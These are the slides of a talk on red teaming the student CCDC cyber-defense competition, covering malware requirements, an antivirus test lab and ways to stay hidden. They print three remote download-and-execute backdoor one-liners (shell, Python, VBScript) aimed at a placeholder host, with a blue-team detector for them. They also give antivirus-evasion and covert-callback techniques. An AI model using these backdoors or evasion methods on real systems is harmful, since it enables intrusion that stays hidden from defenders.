Red teaming the CCDC


Red Teaming the CCDC: hacking the most paranoid student system administrators in the nation

Matt “scriptjunkie” Weeks

Some funny things: our mistakes and yours

No, don’t start “aCcbsXoAIfRsU”

Those other people logged in are not your friends.

You planned to get hacked?

A year of curating red team wallpaper

Gotta keep up with changing memes

The red team has you

Screenshot inception!

Personal Favorite

https://www.youtube.com/watch?v=TrnUO6TLrtE

The malware games: challenges writing malware

Requirements

Full-featured RAT

File access

Interactive shell

Screenshots, keylogger

May include stealth features

Basic backdoors

Used for re-establishing full-featured RAT

Simple command and/or shellcode execution

Callback or listening

Keylogger/persistent monitoring

File packing tools

Worms – every method possible

Compatibility is hard

Windows XP – Win 8.1

Hook-based keylogging fails…

*NIX’s

Make Windows look great

No two Linux distros startup the same

OS X(!)

NetBSD

OpenBSD

FreeBSD

x64/x86

OpenIndiana (Solaris)

Ubuntu

Fedora

Linux Mint

But hard work pays off, kids

On-the-fly backdoors

Usually you are caught off-guard with at least one system

Webshell collections are your friend

Scripting skills are a must

Shell (note the space after while; without it the loop never starts):

    while [ true ] ; do wget -O - http://a.bc/def | sh ; sleep 10 ; done

Python 2:

    eval(urllib2.urlopen('http://a.bc/def').read())

Windows (VBScript written out and started from a cmd prompt, one line):

    echo Set x=CreateObject("Microsoft.XMLHTTP"):x.Open "GET","http://a.bc/def",False:x.Send:Execute x.responseText >>v.vbs&start v.vbs
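Each of the three one-liners above has the same shape: fetch remote content, then hand it straight to an interpreter. From the blue-team side that shape is what to alert on in process-creation logs. The following is an added example, not code from the talk; it runs three pattern checks over constructed "host|user|command line" records (the hostnames, users and log format are assumptions for illustration).

```python
import re

# Constructed sample process-creation records (not from the talk):
# "host|user|command line", one per line.
SAMPLE_LOG = """\
web01|www-data|while [ true ] ; do wget -O - http://a.bc/def | sh ; sleep 10 ; done
db02|postgres|python -c "eval(urllib2.urlopen('http://a.bc/def').read())"
dc01|svc_backup|cmd /c echo Set x=CreateObject("Microsoft.XMLHTTP"):x.Open "GET","http://a.bc/def",False:x.Send:Execute x.responseText >>v.vbs&start v.vbs
web01|admin|wget -O /tmp/patch.tar.gz https://updates.example.org/patch.tar.gz
db02|postgres|psql -c 'select 1'
"""

# One pattern per download-and-execute shape shown in the talk.  Each requires
# both the fetch and the execution step, so a plain download does not match.
PATTERNS = {
    "shell: fetch piped to interpreter": re.compile(
        r"\b(?:wget|curl)\b[^|;&]*\|\s*(?:ba|z|da)?sh\b"),
    "python: eval of urlopen body": re.compile(
        r"\beval\(\s*urllib2?\.(?:request\.)?urlopen\("),
    "vbscript: XMLHTTP body executed": re.compile(
        r"Microsoft\.XMLHTTP.*\bExecute\s+\w+\.responseText", re.IGNORECASE),
}


def classify(cmdline):
    """Return the names of every download-and-execute pattern the command line matches."""
    return [name for name, rx in PATTERNS.items() if rx.search(cmdline)]


def scan(log_text):
    """Parse host|user|cmdline records and return (host, user, matches) for each hit."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        # maxsplit=2 keeps any '|' inside the command line itself intact
        host, user, cmdline = line.split("|", 2)
        matches = classify(cmdline)
        if matches:
            hits.append((host, user, matches))
    return hits


if __name__ == "__main__":
    for host, user, matches in scan(SAMPLE_LOG):
        print(f"{host} {user}: {', '.join(matches)}")
```

The fourth record (a plain wget to disk) and the fifth (psql) produce no hit, which is the point: the alert keys on fetch plus immediate execution, not on the download tool.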

First world red team problems:

I accidentally six or seven keylogger copies

On Antivirus

-or- why does everybody use MBAM?

Process

Write malware -> Does AV detect?

Yes -> Look for shady code; obfuscate functions, strings -> back to "Does AV detect?"

No -> Done!

But usually

Write malware -> Does AV detect? -> No -> Done!

AV test lab

Top market share AV’s (Internet Security Suite version) on default settings

7 “fresh” tests (results BEFORE I knew what any of the AV’s would detect)

Why not VirusTotal?

Test 1: Widely known malware with 1 byte appended

The only way to fail is by using giant hash lists instead of real signatures

Results (one per AV product, in slide order; product logos were not captured in the extraction): FAIL, WIN, FAIL, WIN, FAIL, FAIL, FAIL, FAIL, WIN, WIN, WIN, WIN

Test 2: Malware with public code samples

Results: FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL

Test 3: One-off malware with no evasions

Results: FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, INDECISIVE, FAIL, WIN, WIN, WIN, INDECISIVE

Test 4: "Chris's Ex-Girlfriend" – Highly evasive malware workhorse

Results: FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL

Test 5: "The Kraken" – Sneaky firewall-evading malware

Results: FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, WIN

Test 6: Worm with no evasions

Results: FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, WIN, WIN, FAIL, Hosed VM, FAIL, FAIL

Test 7: Legit program used maliciously

Results: FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, INDECISIVE

Notes

Symantec was only AV to detect reverse meterpreter on the wire

Kaspersky’s behavioral emulation detected one worm well

Kaspersky and Comodo both recognized at least one piece of malware as unusual (not on whitelist), but not necessarily bad

Trend Micro was only AV to block hash dumping

Panda, Avast gave errors installing and were not tested

Final standings

Standings (one per AV product, in slide order; product logos were not captured in the extraction): 100% FAIL, meh, 100% FAIL, TIED 1st, 100% FAIL, 100% FAIL, FAIL, FAIL, meh, TIED 1st, 3rd, meh

Just kidding. After 2 hours obfuscating, these are the real final standings:

FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL

How do I bypass AV?

Write your own stuff

Dynamically resolve API calls

Obfuscate strings

Introduce environmental/system dependencies to generically thwart sandboxing

Write your own stuff

Impersonate legitimate software

Watch what hits disk

Digitally sign your stuff if you can

Write your own stuff

Security Software Lessons

Some AV’s are a total fail

MalwareBytes Pro is in this list with MS, McAfee, F-Secure

Many have one really cool feature or heuristic

Kaspersky, Symantec, Trend Micro

All can be bypassed easily for most malware

Only detection remaining after 2 hours was one worm vs Kaspersky

Hiding from the students

Host hiding

Hide while running

Hide start

Meterpreter is great for functionality, bad for persistence

Mostly custom malware

Mostly standard persistence methods

Don’t run in your own process

Don’t use any of those toy languages with dependencies

Use C!

Don’t hide stuff rootkit finders look for

Don’t sweat the one-offs

Hiding on the wires

Hiding from Wireshark

Harder than hiding on host

Try to blend in with normal traffic

Throw Wireshark crashers

Remove packets from view

Hiding from netstat/tcpview

Using HTTP(S) instead of TCP callbacks doesn’t leave connection open

If that fails, blend in by using common ports and cloud IP’s

Migrate session to web browser or critical process

Hiding on the wires

Use every protocol that gets out

TCP

UDP

HTTPS

DNS

Use hop points in cloud/web hosting

Use file sharing/paste/social media sites

Random callback selection and delays to avoid monitors

Any way students can send or receive info, you can too

Dealing with firewalls

Two types

Host

Network

Host firewalls

Usually don’t stop outbound traffic

Can go underneath, watch raw packets

Frequently add exceptions or drop the firewall

Network firewalls

Great to own

Tough if you don’t

Use service ports, since they must be able to reach the hosts

Defenses that hurt

Patch or block RCE’s

Strict inbound and outbound network firewall rules

Traffic monitoring

Different passwords on all the boxes

Pull the plug

Reverting (sometimes)

Realizing that sometimes, the red team can't hurt you as much as finishing injects helps you

Questions

@scriptjunkie1

https://scriptjunkie.us/
